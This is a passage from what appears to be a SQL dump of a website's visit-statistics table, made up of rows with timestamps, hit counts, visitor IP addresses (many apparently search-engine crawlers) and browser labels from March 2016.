8.180.229.235',''),(23393,1458418452,4,4,0,0,'5.255.253.110','other'),(23394,1458418454,4,4,0,0,'5.255.253.55','other'),(23395,1458418455,4,4,0,0,'130.193.37.27','other'),(23396,1458418457,4,4,0,0,'130.193.51.85','other'),(23397,1458418458,2,2,0,0,'141.8.142.8','other'),(23398,1458418461,1,1,0,0,'141.8.132.2','other'),(23399,1458418462,3,3,0,0,'5.255.253.103','other'),(23400,1458418463,2,2,0,0,'130.193.50.22','other'),(23401,1458418466,4,4,0,0,'93.158.152.65','other'),(23402,1458418467,5,5,0,0,'130.193.51.55','other'),(23403,1458418468,4,4,0,0,'141.8.132.66','other'),(23404,1458418469,1,1,0,0,'5.255.253.100','other'),(23405,1458418476,1,1,0,0,'93.158.152.26','other'),(23406,1458418482,3,3,0,0,'141.8.142.82','other'),(23407,1458418485,1,1,0,0,'130.193.51.81','other'),(23408,1458418493,1,1,0,0,'141.8.132.97','other'),(23409,1458418515,1,1,0,0,'141.8.132.109','other'),(23410,1458418522,1,1,0,0,'5.255.253.94','other'),(23411,1458418590,1,1,0,0,'82.145.209.114','other'),(23412,1458418687,1,1,0,0,'94.179.41.124','firefox'),(23413,1458418689,1,1,0,0,'31.13.102.105','other'),(23415,1458418793,1,1,0,0,'217.69.133.226','other'),(23416,1458419063,4,0,4,0,'66.249.78.144',''),(23417,1458419137,4,0,4,0,'66.249.78.151',''),(23418,1458419312,3,0,3,0,'66.249.78.158',''),(23419,1458419641,3,0,3,0,'66.249.66.158',''),(23420,1458419937,2,0,2,0,'66.249.66.166',''),(23421,1458419996,1,0,1,0,'66.249.78.144',''),(23422,1458420166,2,0,2,0,'66.249.78.151',''),(23423,1458420390,1,1,0,0,'216.163.188.238','firefox'),(23424,1458420431,1,1,0,0,'141.8.184.18','other'),(23425,1458420432,1,1,0,0,'5.255.253.100','other'),(23426,1458420433,1,1,0,0,'93.158.152.9','other'),(23427,1458420584,1,1,0,0,'91.196.177.69','chrome'),(23428,1458420971,1,1,0,0,'8.29.198.25','other'),(23429,1458421300,1,1,0,0,'40.77.167.73','other'),(23430,1458421962,3,3,0,0,'141.8.184.18','other'),(23431,1458421963,2,2,0,0,'93.158.152.9','other'),(23432,1458421964,2,2,0,0,'178.154.149.11','other'),(23433,1458421965,2,2,0,0,'5.255.253.53','other'),(23434,1458421966,2,2,0,0,'141.8.183.14','other'),(23435,1458421994,2,2,0,0,'80.91.162.99','other'),(23436,1458424162,3,0,3,0,'66.249.78.144',''),(23437,1458424429,1,1,0,0,'217.69.133.222','other'),(23438,1458424497,3,3,0,0,'188.163.78.40','other'),(23439,1458424784,2,1,1,0,'66.249.78.158',''),(23440,1458424993,1,1,0,0,'66.249.92.103','other'),(23441,1458425286,1,1,0,0,'217.69.133.67','other'),(23442,1458425556,1,0,1,0,'66.249.78.151',''),(23443,1458425973,1,1,0,0,'37.115.93.112','chrome'),(23444,1458426404,3,0,3,0,'66.249.78.144',''),(23445,1458426836,1,0,1,0,'66.249.78.151',''),(23446,1458426972,2,2,0,0,'178.154.189.204','other'),(23447,1458426990,1,1,0,0,'37.9.122.203','other'),(23448,1458427448,2,0,2,0,'66.249.78.158',''),(23449,1458427829,2,2,0,0,'66.249.78.151','other'),(23450,1458428417,1,1,0,0,'66.249.66.166','other'),(23451,1458428462,7,7,0,0,'66.249.78.144','other'),(23452,1458429286,1,1,0,0,'157.55.39.228','other'),(23453,1458429446,1,1,0,0,'180.76.15.22','other'),(23454,1458429477,1,1,0,0,'157.55.39.253','other'),(23455,1458429533,1,0,1,0,'68.180.229.235',''),(23456,1458429742,1,1,0,0,'217.69.143.49','other'),(23457,1458429998,1,1,0,0,'157.55.39.46','other'),(23458,1458430012,2,0,2,0,'66.249.78.151',''),(23459,1458430564,1,0,1,0,'66.249.78.158',''),(23460,1458431078,2,0,2,0,'66.249.78.151',''),(23461,1458431334,1,1,0,0,'5.9.87.111','other'),(23462,1458431420,1,0,1,0,'66.249.78.30',''),(23463,1458431860,1,1,0,0,'8.29.198.25','other'),(23464,1458431893,1,1,0,0,'66.249.78.144','other'),(23465,1458431949,2,0,2,0,'66.249.78.158',''),(23466,1458432150,1,1,0,0,'176.122.126.33','chrome'),(23467,1458432370,2,2,0,0,'157.55.39.253','other'),(23468,1458432590,1,0,1,0,'66.249.78.151',''),(23469,1458432638,2,2,0,0,'217.69.143.69','other'),(23470,1458433158,1,0,1,0,'66.249.78.158',''),(23471,1458433403,1,1,0,0,'217.69.143.65','other'),(23472,1458433464,1,1,0,0,'180.76.15.145','other'),(23473,1458433715,1,0,1,0,'66.249.78.151',''),(23474,1458433725,2,1,1,0,'66.249.78.151',''),(23475,1458433931,2,2,0,0,'157.55.39.228','other'),(23476,1458434047,1,1,0,0,'130.193.37.27','other'),(23478,1458434136,1,0,1,0,'66.249.78.158',''),(23479,1458434385,1,0,1,0,'66.249.78.144',''),(23480,1458434413,1,1,0,0,'157.55.39.253','other'),(23481,1458435603,1,0,1,0,'66.249.78.151',''),(23482,1458436273,1,1,0,0,'66.249.92.95','other'),(23483,1458436592,1,0,1,0,'66.249.78.144',''),(23484,1458436666,1,0,1,0,'66.249.78.158',''),(23485,1458436762,2,0,2,0,'66.249.78.151',''),(23486,1458436853,1,1,0,0,'217.69.133.14','other'),(23487,1458436875,1,1,0,0,'217.69.143.42','other'),(23488,1458437542,1,1,0,0,'217.69.143.65','other'),(23489,1458437664,1,0,1,0,'66.249.78.144',''),(23490,1458438300,1,1,0,0,'40.77.167.73','other'),(23491,1458438659,1,0,1,0,'66.249.66.166',''),(23492,1458438942,1,1,0,0,'141.8.132.79','other'),(23493,1458438943,1,1,0,0,'141.8.142.41','other'),(23494,1458438944,1,1,0,0,'130.193.51.85','other'),(23495,1458438945,1,1,0,0,'178.154.189.6','other'),(23497,1458438946,1,1,0,0,'130.193.51.81','other'),(23498,1458438947,1,1,0,0,'178.154.149.11','other'),(23499,1458439450,53,53,0,0,'157.55.39.228','other'),(23500,1458439479,43,43,0,0,'157.55.39.253','other'),(23501,1458439554,40,40,0,0,'40.77.167.73','other'),(23502,1458439690,7,7,0,0,'157.55.39.17','other'),(23503,1458439966,3,0,3,0,'66.249.78.144',''),(23504,1458440271,1,1,0,0,'66.249.78.158','other'),(23505,1458440553,2,0,2,0,'68.180.229.235',''),(23506,1458440945,48,48,0,0,'157.55.39.17','other'),(23507,1458441066,1,1,0,0,'40.77.167.73','other'),(23508,1458441127,4,4,0,0,'94.154.239.69','other'),(23509,1458441154,2,0,2,0,'66.249.78.151',''),(23510,1458441641,1,1,0,0,'217.69.133.12','other'),(23511,1458441780,1,0,1,0,'66.249.78.37',''),(23512,1458442009,1,0,1,0,'66.249.78.144',''),(23513,1458442011,1,1,0,0,'40.77.167.73','other'),(23514,1458442200,4,4,0,0,'157.55.39.17','other'),(23515,1458442217,1,0,1,0,'66.249.78.151',''),(23516,1458442566,1,0,1,0,'66.249.78.158',''),(23517,1458442672,1,1,0,0,'8.29.198.25','other'),(23518,1458442743,1,1,0,0,'130.193.51.22','other'),(23519,1458443097,1,1,0,0,'40.77.167.73','other'),(23520,1458443362,1,1,0,0,'217.69.133.203','other'),(23521,1458443974,1,1,0,0,'141.8.132.76','other'),(23522,1458443975,1,1,0,0,'141.8.142.41','other'),(23524,1458443976,1,1,0,0,'93.158.152.9','other'),(23525,1458443977,1,1,0,0,'141.8.132.99','other'),(23526,1458443999,1,1,0,0,'157.55.39.228','other'),(23527,1458444336,1,1,0,0,'40.77.167.73','other'),(23528,1458444434,1,0,1,0,'66.249.78.158',''),(23529,1458444514,1,0,1,0,'66.249.78.151',''),(23530,1458444930,1,1,0,0,'217.69.133.220','other'),(23531,1458445840,1,1,0,0,'40.77.167.73','other'),(23532,1458446008,2,0,2,0,'66.249.78.158',''),(23533,1458446583,1,1,0,0,'66.249.92.95','other'),(23534,1458446783,1,1,0,0,'40.77.167.55','other'),(23535,1458447337,1,1,0,0,'40.77.167.73','other'),(23536,1458447598,2,2,0,0,'66.249.78.158','other'),(23537,1458447599,1,0,1,0,'66.249.66.166',''),(23538,1458447668,1,0,1,0,'68.180.229.235',''),(23539,1458447729,1,1,0,0,'51.255.65.28','other'),(23540,1458448029,1,1,0,0,'51.255.66.191','other'),(23541,1458448101,1,0,1,0,'66.249.78.151',''),(23542,1458448263,1,1,0,0,'40.77.167.73','other'),(23543,1458448440,1,1,0,0,'62.210.215.100','chrome'),(23544,1458448578,3,3,0,0,'66.249.78.151','other'),(23545,1458448819,1,1,0,0,'87.207.112.42','firefox'),(23546,1458449129,1,1,0,0,'164.132.161.81','other'),(23547,1458449198,1,1,0,0,'40.77.167.73','other'),(23548,1458449247,3,1,2,0,'66.249.78.144',''),(23549,1458449526,1,1,0,0,'217.69.143.68','other'),(23550,1458449617,1,1,0,0,'217.69.133.216','other'),(23551,1458449798,1,0,1,0,'66.249.78.37',''),(23552,1458450033,3,2,1,0,'66.249.78.151',''),(23553,1458450270,1,1,0,0,'51.255.66.157','other'),(23554,1458450379,3,0,3,0,'66.249.78.144',''),(23555,1458450855,2,0,2,0,'66.249.66.158',''),(23556,1458450889,2,1,1,0,'66.249.78.144',''),(23557,1458451243,3,2,1,0,'66.249.78.151',''),(23558,1458451398,1,0,1,0,'66.249.66.162',''),(23559,1458451437,1,1,0,0,'151.80.31.182','other'),(23560,1458451518,1,1,0,0,'66.249.78.158','other'),(23561,1458451686,1,0,1,0,'66.249.78.37',''),(23562,1458452187,1,1,0,0,'157.55.39.197','other'),(23563,1458452460,1,1,0,0,'217.69.143.59','other'),(23564,1458453078,1,1,0,0,'51.255.65.69','other'),(23565,1458453162,1,1,0,0,'217.69.143.68','other'),(23566,1458453366,1,1,0,0,'151.80.31.155','other'),(23567,1458453400,1,1,0,0,'151.80.31.177','other'),(23568,1458453495,1,1,0,0,'8.29.198.26','other'),(23569,1458453581,1,0,1,0,'68.180.229.235',''),(23570,1458453875,1,1,0,0,'164.132.161.85','other'),(23571,1458454341,1,1,0,0,'217.69.133.193','other'),(23572,1458454392,91,91,0,0,'82.193.127.15','other'),(23573,1458454886,1,0,1,0,'66.249.78.151',''),(23574,1458455167,1,1,0,0,'217.69.143.69','other'),(23575,1458455208,1,1,0,0,'94.179.25.85','firefox'),(23576,1458455478,1,1,0,0,'51.255.65.68','other'),(23577,1458455909,2,1,1,0,'66.249.78.144',''),(23578,1458456441,2,0,2,0,'66.249.78.151',''),(23579,1458457042,1,1,0,0,'66.249.92.103','other'),(23580,1458457073,1,0,1,0,'68.180.229.235',''),(23581,1458457989,1,1,0,0,'51.255.65.42','other'),(23582,1458457997,1,1,0,0,'217.69.143.44','other'),(23583,1458458309,1,1,0,0,'40.77.167.73','other'),(23584,1458458592,1,1,0,0,'193.201.227.144','firefox'),(23585,1458458627,1,1,0,0,'217.69.133.84','other'),(23586,1458458753,1,0,1,0,'66.249.78.158',''),(23587,1458459151,1,0,1,0,'66.249.78.30',''),(23588,1458459807,1,1,0,0,'141.8.142.41','other'),(23589,1458459811,1,1,0,0,'141.8.142.8','other'),(23590,1458459815,1,1,0,0,'141.8.184.18','other'),(23591,1458460110,1,1,0,0,'217.69.133.219','other'),(23592,1458460296,1,1,0,0,'157.55.39.197','other'),(23593,1458460677,2,0,2,0,'68.180.229.235',''),(23594,1458460883,1,1,0,0,'66.249.78.158','other'),(23595,1458461415,1,1,0,0,'51.255.66.147','other'),(23596,1458462578,1,0,1,0,'66.249.78.144',''),(23597,1458463689,1,1,0,0,'217.69.143.51','other'),(23598,1458463719,1,1,0,0,'157.55.39.110','other'),(23599,1458464218,1,1,0,0,'217.69.133.6','other'),(23600,1458464219,1,1,0,0,'217.69.133.3','other'),(23601,1458464349,1,1,0,0,'8.29.198.25','other'),(23602,1458464639,3,0,3,0,'66.249.78.151',''),(23603,1458464645,2,0,2,0,'66.249.66.162',''),(23604,1458464768,2,0,2,0,'66.249.78.144',''),(23605,1458464780,1,0,1,0,'66.249.66.158',''),(23606,1458465441,1,1,0,0,'151.80.31.163','other'),(23607,1458465677,1,1,0,0,'217.69.143.63','other'),(23608,1458465978,1,1,0,0,'66.249.78.158','other'),(23609,1458466123,1,1,0,0,'164.132.161.26','other'),(23610,1458466241,1,1,0,0,'217.69.143.60','other'),(23611,1458466412,1,1,0,0,'217.69.143.47','other'),(23612,1458466620,1,1,0,0,'141.8.132.76','other'),(23613,1458466807,1,1,0,0,'151.80.31.107','other'),(23614,1458467091,4,0,4,0,'66.249.78.151',''),(23615,1458467152,7,0,7,0,'66.249.78.144',''),(23616,1458467170,1,1,0,0,'92.113.126.96','chrome'),(23617,1458467502,1,0,1,0,'66.249.66.162',''),(23618,1458467593,1,1,0,0,'66.249.92.99','other'),(23619,1458468600,1,1,0,0,'51.255.65.74','other'),(23620,1458469014,1,1,0,0,'78.111.186.3','chrome'),(23621,1458469378,1,1,0,0,'217.69.133.219','other'),(23622,1458469467,2,0,2,0,'66.249.78.151',''),(23623,1458469489,1,1,0,0,'51.255.66.106','other'),(23624,1458469620,1,1,0,0,'51.255.66.142','other'),(23625,1458469720,1,1,0,0,'91.196.178.97','chrome'),(23626,1458469904,1,0,1,0,'68.180.229.235',''),(23627,1458470284,1,1,0,0,'217.69.133.67','other'),(23628,1458470639,1,0,1,0,'66.249.78.158',''),(23629,1458471037,1,1,0,0,'176.37.233.250','chrome'),(23630,1458471099,1,1,0,0,'157.55.39.228','other'),(23631,1458471193,1,0,1,0,'68.180.229.235',''),(23632,1458471441,8,7,1,0,'66.249.78.144',''),(23633,1458471659,1,1,0,0,'216.163.188.232','firefox'),(23634,1458472095,1,1,0,0,'66.249.78.158','other'),(23635,1458472180,1,1,0,0,'217.69.143.69','other'),(23636,1458472618,1,1,0,0,'217.69.133.218','other'),(23637,1458472696,1,1,0,0,'164.132.161.93','other'),(23638,1458472740,1,1,0,0,'66.249.78.151','other'),(23639,1458472838,1,1,0,0,'180.76.15.23','other'),(23640,1458473097,1,1,0,0,'157.55.39.27','other'),(23641,1458473137,1,1,0,0,'185.11.29.114','chrome'),(23642,1458473272,83,83,0,0,'69.30.215.106','other'),(23643,1458473334,1,1,0,0,'93.158.152.9','other'),(23644,1458474077,2,0,2,0,'68.180.229.235',''),(23645,1458474779,1,0,1,0,'66.249.78.144',''),(23646,1458474992,1,1,0,0,'91.124.181.86','firefox'),(23647,1458475131,1,1,0,0,'164.132.161.23','other'),(23648,1458475180,1,1,0,0,'8.29.198.25','other'),(23649,1458475203,1,0,1,0,'66.249.78.151',''),(23650,1458475251,254,254,0,0,'51.255.207.3','other'),(23651,1458475378,2,0,2,0,'66.249.78.158',''),(23652,1458475705,1,1,0,0,'66.249.78.30','other'),(23653,1458476070,1,1,0,0,'164.132.161.93','other'),(23654,1458476104,1,1,0,0,'66.249.78.44','other'),(23655,1458476111,2,2,0,0,'178.154.189.201','other'),(23656,1458476118,1,1,0,0,'93.158.152.201','other'),(23657,1458476125,2,2,0,0,'178.154.189.204','other'),(23658,1458476139,1,1,0,0,'37.9.122.202','other'),(23659,1458476154,46,46,0,0,'51.255.207.3','other'),(23660,1458476186,1,1,0,0,'78.111.190.88','chrome'),(23661,1458476855,1,1,0,0,'180.76.15.162','other'),(23662,1458476950,3,0,3,0,'68.180.229.235',''),(23663,1458476968,1,1,0,0,'164.132.161.70','other'),(23664,1458477021,1,1,0,0,'217.69.133.218','other'),(23665,1458477063,2,2,0,0,'178.154.189.204','other'),(23666,1458477080,1,1,0,0,'84.195.102.159','firefox'),(23667,1458477092,1,1,0,0,'183.207.228.40','firefox'),(23668,1458477172,1,1,0,0,'178.154.189.201','other'),(23669,1458477198,1,1,0,0,'93.158.152.201','other'),(23670,1458477289,1,0,1,0,'66.249.78.151',''),(23671,1458477323,1,1,0,0,'217.69.133.13','other'),(23672,1458477558,2,1,1,0,'66.249.78.158',''),(23673,1458477748,1,0,1,0,'66.249.78.30',''),(23674,1458478053,1,1,0,0,'66.249.92.103','other'),(23675,1458478850,1,1,0,0,'66.249.78.144','other'),(23676,1458479014,1,1,0,0,'185.43.251.187','chrome'),(23677,1458479100,1,1,0,0,'193.201.227.144','chrome'),(23678,1458479142,2,0,2,0,'68.180.229.235',''),(23679,1458479652,1,0,1,0,'66.249.78.158',''),(23680,1458479701,1,1,0,0,'62.210.215.100','chrome'),(23681,1458480027,1,1,0,0,'66.249.78.158','other'),(23682,1458480126,1,1,0,0,'66.249.78.30','other'),(23683,1458480357,1,0,1,0,'66.249.78.144',''),(23684,1458480499,1,1,0,0,'217.69.133.67','other'),(23685,1458480860,1,1,0,0,'66.249.78.151','other'),(23686,1458480885,1,0,1,0,'66.249.66.158',''),(23687,1458481179,1,1,0,0,'51.255.66.188','other'),(23688,1458481387,1,1,0,0,'217.69.133.215','other'),(23689,1458481405,1,1,0,0,'217.69.133.68','other'),(23690,1458481792,1,1,0,0,'51.255.65.58','other'),(23691,1458481967,1,1,0,0,'66.249.78.151','other'),(23692,1458482090,1,1,0,0,'66.249.78.37','other'),(23693,1458482366,1,0,1,0,'66.249.66.166',''),(23694,1458482515,4,0,4,0,'66.249.78.144',''),(23695,1458482554,1,0,1,0,'66.249.78.158',''),(23696,1458482626,1,1,0,0,'94.179.50.40','chrome'),(23697,1458482871,1,0,1,0,'66.249.78.151',''),(23698,1458482917,1,1,0,0,'46.172.240.162','chrome'),(23699,1458483215,1,1,0,0,'213.179.252.77','chrome'),(23700,1458483688,1,1,0,0,'217.69.133.216','other'),(23701,1458483930,1,0,1,0,'66.249.78.151',''),(23702,1458484054,1,0,1,0,'68.180.229.235',''),(23703,1458484055,1,1,0,0,'5.255.253.103','other'),(23704,1458484059,1,1,0,0,'130.193.50.31','other'),(23705,1458484085,1,0,1,0,'66.249.78.144',''),(23706,1458484349,1,1,0,0,'66.249.93.86','chrome'),(23707,1458484472,2,2,0,0,'141.8.142.82','other'),(23708,1458484475,1,1,0,0,'93.158.152.81','other'),(23709,1458484511,1,1,0,0,'66.249.93.90','chrome'),(23710,1458484616,1,1,0,0,'141.8.142.60','other'),(23711,1458484620,2,2,0,0,'141.8.132.44','other'),(23712,1458484624,1,1,0,0,'141.8.142.10','other'),(23713,1458484628,2,2,0,0,'130.193.51.55','other'),(23714,1458484632,1,1,0,0,'130.193.51.22','other'),(23715,1458484802,1,1,0,0,'141.8.184.22','other'),(23716,1458484892,1,1,0,0,'141.8.132.109','other'),(23717,1458484969,1,0,1,0,'66.249.78.158',''),(23718,1458484988,3,3,0,0,'141.8.132.66','other'),(23719,1458485010,3,3,0,0,'5.255.253.100','other'),(23720,1458485019,1,1,0,0,'5.255.253.17','other'),(23721,1458485023,1,1,0,0,'5.255.253.51','other'),(23722,1458485027,1,1,0,0,'130.193.51.102','other'),(23723,1458485039,3,3,0,0,'141.8.132.48','other'),(23724,1458485043,1,1,0,0,'130.193.51.50','other'),(23725,1458485100,1,1,0,0,'178.154.189.6','other'),(23726,1458485104,1,1,0,0,'141.8.184.18','other'),(23727,1458485107,1,1,0,0,'5.255.253.89','other'),(23728,1458485111,2,2,0,0,'5.255.253.103','other'),(23729,1458485115,3,3,0,0,'5.255.253.94','other'),(23730,1458485323,1,0,1,0,'68.180.229.235',''),(23731,1458485425,5,5,0,0,'5.255.253.62','other'),(23732,1458485541,1,1,0,0,'217.69.136.208','other'),(23733,1458485698,4,4,0,0,'93.158.152.81','other'),(23734,1458485705,1,1,0,0,'130.193.51.85','other'),(23735,1458485708,4,4,0,0,'141.8.142.55','other'),(23736,1458485735,2,2,0,0,'130.193.50.31','other'),(23737,1458485831,4,4,0,0,'130.193.51.109','other'),(23738,1458485834,4,4,0,0,'141.8.132.44','other'),(23739,1458485906,2,2,0,0,'141.8.142.82','other'),(23740,1458485913,3,3,0,0,'141.8.184.22','other'),(23741,1458485916,1,1,0,0,'130.193.51.81','other'),(23742,1458485919,2,2,0,0,'141.8.132.74','other'),(23743,1458485932,2,2,0,0,'130.193.50.22','other'),(23744,1458485966,3,3,0,0,'130.193.51.50','other'),(23745,1458485969,4,4,0,0,'178.154.189.12','other'),(23746,1458485989,1,1,0,0,'8.29.198.25','other'),(23747,1458486020,2,2,0,0,'93.158.152.65','other'),(23748,1458486068,4,4,0,0,'5.255.253.89','other'),(23749,1458486078,6,6,0,0,'178.154.149.9','other'),(23750,1458486137,1,1,0,0,'93.158.152.26','other'),(23751,1458486160,1,1,0,0,'141.8.184.31','other'),(23752,1458486161,3,3,0,0,'5.255.253.17','other'),(23753,1458486167,1,1,0,0,'130.193.51.43','other'),(23754,1458486168,3,3,0,0,'5.255.253.94','other'),(23755,1458486170,1,1,0,0,'141.8.132.66','other'),(23756,1458486176,2,2,0,0,'130.193.51.7','other'),(23757,1458486177,2,2,0,0,'141.8.132.109','other'),(23758,1458486180,3,3,0,0,'130.193.51.22','other'),(23759,1458486182,3,3,0,0,'5.255.253.100','other'),(23760,1458486183,1,1,0,0,'141.8.142.10','other'),(23761,1458486184,2,2,0,0,'141.8.142.60','other'),(23762,1458486244,2,2,0,0,'178.154.189.6','other'),(23763,1458486253,1,1,0,0,'141.8.132.48','other'),(23764,1458486255,1,1,0,0,'141.8.184.6','other'),(23765,1458486264,1,1,0,0,'141.8.184.18','other'),(23766,1458486301,2,2,0,0,'5.255.253.103','other'),(23767,1458486574,2,0,2,0,'66.249.78.158',''),(23768,1458486580,1,1,0,0,'51.255.66.110','other'),(23769,1458486814,2,2,0,0,'130.193.51.55','other'),(23771,1458486827,1,1,0,0,'141.8.132.74','other'),(23772,1458486855,1,1,0,0,'93.158.152.9','other'),(23773,1458486856,2,2,0,0,'141.8.184.22','other'),(23774,1458486860,2,2,0,0,'5.255.253.51','other'),(23775,1458486861,2,2,0,0,'141.8.132.44','other'),(23776,1458486961,1,1,0,0,'217.69.133.215','other'),(23777,1458486962,1,1,0,0,'217.69.133.85','other'),(23778,1458487375,2,2,0,0,'178.154.189.12','other'),(23779,1458487376,3,3,0,0,'141.8.132.48','other'),(23780,1458487389,2,2,0,0,'130.193.50.31','other'),(23781,1458487390,1,1,0,0,'141.8.132.2','other'),(23782,1458487391,2,2,0,0,'141.8.142.55','other'),(23783,1458487443,2,2,0,0,'130.193.51.22','other'),(23785,1458487526,1,1,0,0,'5.255.253.89','other'),(23786,1458487527,1,1,0,0,'130.193.51.7','other'),(23787,1458487528,2,2,0,0,'5.255.253.94','other'),(23788,1458487531,3,3,0,0,'141.8.132.99','other'),(23789,1458487591,1,1,0,0,'5.255.253.100','other'),(23790,1458487594,1,1,0,0,'141.8.132.66','other'),(23792,1458487614,5,5,0,0,'130.193.51.109','other'),(23794,1458487618,1,1,0,0,'141.8.142.82','other'),(23795,1458487623,1,1,0,0,'141.8.132.109','other'),(23796,1458487677,2,2,0,0,'5.255.253.103','other'),(23797,1458487734,1,1,0,0,'5.255.253.10','other'),(23798,1458487736,1,1,0,0,'93.158.152.65','other'),(23799,1458487769,1,1,0,0,'5.255.253.62','other'),(23801,1458487792,1,1,0,0,'87.207.112.42','firefox'),(23802,1458487807,2,2,0,0,'130.193.51.50','other'),(23803,1458487843,1,1,0,0,'141.8.132.74','other'),(23804,1458487849,1,0,1,0,'66.249.78.30',''),(23805,1458487864,1,1,0,0,'141.8.184.6','other'),(23806,1458487866,1,1,0,0,'141.8.183.14','other'),(23807,1458487867,1,1,0,0,'5.255.253.51','other'),(23808,1458487872,1,1,0,0,'141.8.142.60','other'),(23809,1458487899,1,1,0,0,'141.8.184.22','other'),(23810,1458488451,1,1,0,0,'185.43.251.187','firefox'),(23811,1458488606,1,1,0,0,'66.249.78.158','other'),(23812,1458488682,1,1,0,0,'66.249.92.99','other'),(23813,1458489074,1,1,0,0,'93.158.152.65','other'),(23814,1458489075,1,1,0,0,'130.193.51.50','other'),(23815,1458489181,1,1,0,0,'51.255.66.148','other'),(23816,1458489499,2,0,2,0,'66.249.78.151',''),(23817,1458489576,2,0,2,0,'66.249.78.144',''),(23818,1458489641,1,1,0,0,'94.248.58.71','chrome'),(23819,1458489751,1,1,0,0,'51.255.65.50','other'),(23820,1458490082,1,1,0,0,'130.193.50.31','other'),(23821,1458490083,1,1,0,0,'5.255.253.94','other'),(23822,1458490128,1,1,0,0,'91.124.181.86','firefox'),(23823,1458490226,94,94,0,0,'109.87.138.56','other'),(23824,1458490486,1,0,1,0,'66.249.66.162',''),(23825,1458490504,1,1,0,0,'51.255.66.110','other'),(23826,1458490600,1,1,0,0,'164.132.161.83','other'),(23827,1458490677,1,1,0,0,'217.69.133.224','other'),(23828,1458491042,1,1,0,0,'141.8.142.55','other'),(23829,1458491043,1,1,0,0,'5.255.253.110','other'),(23830,1458491044,1,1,0,0,'141.8.132.48','other'),(23831,1458491121,1,0,1,0,'66.249.78.151',''),(23832,1458491212,1,0,1,0,'66.249.78.158',''),(23833,1458491749,2,1,1,0,'66.249.78.144',''),(23834,1458491833,1,0,1,0,'66.249.78.30',''),(23835,1458491865,1,1,0,0,'5.255.253.17','other'),(23836,1458491933,1,1,0,0,'66.249.66.133','other'),(23837,1458492210,1,1,0,0,'66.249.78.30','other'),(23838,1458492334,1,1,0,0,'66.249.78.151','other'),(23839,1458492389,1,1,0,0,'51.255.66.120','other'),(23840,1458492457,1,1,0,0,'91.201.244.247','other'),(23841,1458492644,5,5,0,0,'66.249.78.158','other'),(23842,1458492823,1,1,0,0,'217.69.133.6','other'),(23843,1458492861,1,0,1,0,'68.180.229.235',''),(23844,1458492864,1,1,0,0,'66.249.78.37','other'),(23845,1458492920,4,3,1,0,'66.249.78.144',''),(23846,1458493168,1,1,0,0,'5.255.253.62','other'),(23847,1458493200,2,1,1,0,'66.249.78.144',''),(23848,1458493343,1,1,0,0,'217.69.143.60','other'),(23849,1458493445,2,2,0,0,'66.249.78.144','other'),(23850,1458493775,1,1,0,0,'51.255.66.127','other'),(23851,1458494107,1,1,0,0,'207.46.13.73','other'),(23852,1458494557,1,1,0,0,'66.249.78.151','other'),(23853,1458494566,2,2,0,0,'178.154.149.11','other'),(23854,1458494699,1,1,0,0,'5.255.253.51','other'),(23855,1458494700,1,1,0,0,'130.193.50.22','other'),(23856,1458494701,3,3,0,0,'93.158.152.9','other'),(23858,1458494702,3,3,0,0,'141.8.142.41','other'),(23859,1458494703,3,3,0,0,'141.8.132.74','other'),(23860,1458494705,1,1,0,0,'5.255.253.9','other'),(23861,1458494707,2,2,0,0,'141.8.184.18','other'),(23862,1458494709,1,1,0,0,'130.193.51.81','other'),(23864,1458494715,2,2,0,0,'130.193.37.21','other'),(23865,1458494719,1,1,0,0,'130.193.51.102','other'),(23866,1458494837,1,1,0,0,'93.158.152.26','other'),(23867,1458494838,1,1,0,0,'5.255.253.110','other'),(23868,1458494870,2,1,1,0,'66.249.66.158',''),(23869,1458494963,1,0,1,0,'66.249.78.144',''),(23870,1458495054,1,1,0,0,'66.249.78.144','other'),(23871,1458495209,1,1,0,0,'5.255.253.53','other'),(23872,1458495747,1,1,0,0,'207.46.13.73','other'),(23873,1458496199,1,0,1,0,'66.249.78.44',''),(23874,1458496337,1,1,0,0,'51.255.65.83','other'),(23875,1458496841,1,1,0,0,'8.29.198.25','other'),(23876,1458497266,1,1,0,0,'94.248.58.71','chrome'),(23877,1458497499,1,1,0,0,'217.69.143.55','other'),(23878,1458497642,1,1,0,0,'66.249.78.151','other'),(23879,1458497768,2,1,1,0,'66.249.78.144',''),(23880,1458498186,1,1,0,0,'91.196.178.39','firefox'),(23881,1458498270,1,0,1,0,'66.249.78.158',''),(23882,1458498417,1,0,1,0,'68.180.229.235',''),(23883,1458498691,1,1,0,0,'178.93.149.27','firefox'),(23884,1458498757,1,1,0,0,'178.92.8.196','firefox'),(23885,1458498865,3,0,3,0,'66.249.78.144',''),(23886,1458498875,1,0,1,0,'66.249.78.151',''),(23887,1458498914,1,1,0,0,'51.255.65.90','other'),(23888,1458499225,1,1,0,0,'66.249.78.144','other'),(23889,1458499227,1,1,0,0,'185.43.251.187','chrome'),(23890,1458499945,1,1,0,0,'66.249.92.95','other'),(23891,1458500108,1,1,0,0,'217.69.143.59','other'),(23892,1458500236,1,0,1,0,'66.249.78.144',''),(23893,1458500242,1,1,0,0,'207.46.13.44','other'),(23894,1458500538,1,1,0,0,'149.202.98.160','chrome'),(23895,1458500546,1,1,0,0,'77.247.181.165','chrome'),(23896,1458500578,1,0,1,0,'66.249.78.151',''),(23897,1458500975,2,1,1,0,'66.249.78.144',''),(23898,1458501066,1,1,0,0,'141.0.14.225','other'),(23899,1458501154,1,1,0,0,'141.8.183.14','other'),(23900,1458501155,1,1,0,0,'141.8.132.2','other'),(23901,1458501156,1,1,0,0,'93.158.152.26','other'),(23902,1458501157,1,1,0,0,'5.255.253.9','other'),(23903,1458501569,1,0,1,0,'66.249.78.44',''),(23904,1458501699,1,1,0,0,'141.8.142.88','other'),(23905,1458501700,1,1,0,0,'141.8.132.79','other'),(23907,1458501701,1,1,0,0,'141.8.142.55','other'),(23908,1458501738,1,0,1,0,'66.249.66.162',''),(23909,1458501830,1,1,0,0,'164.132.161.86','other'),(23910,1458501840,1,1,0,0,'51.255.66.146','other'),(23911,1458502246,1,0,1,0,'66.249.78.151',''),(23912,1458502272,2,0,2,0,'66.249.78.144',''),(23913,1458502379,1,0,1,0,'66.249.78.37',''),(23914,1458502964,1,1,0,0,'51.255.65.84','other'),(23915,1458503630,1,0,1,0,'66.249.78.151',''),(23916,1458503686,1,1,0,0,'66.249.78.44','other'),(23917,1458503715,3,3,0,0,'66.249.78.158','other'),(23918,1458503756,1,1,0,0,'78.111.185.33','chrome'),(23919,1458503766,1,1,0,0,'51.255.65.62','other'),(23920,1458503775,1,1,0,0,'66.249.78.37','other'),(23921,1458503803,1,1,0,0,'164.132.161.56','other'),(23922,1458503987,1,1,0,0,'217.69.133.84','other'),(23923,1458503989,2,2,0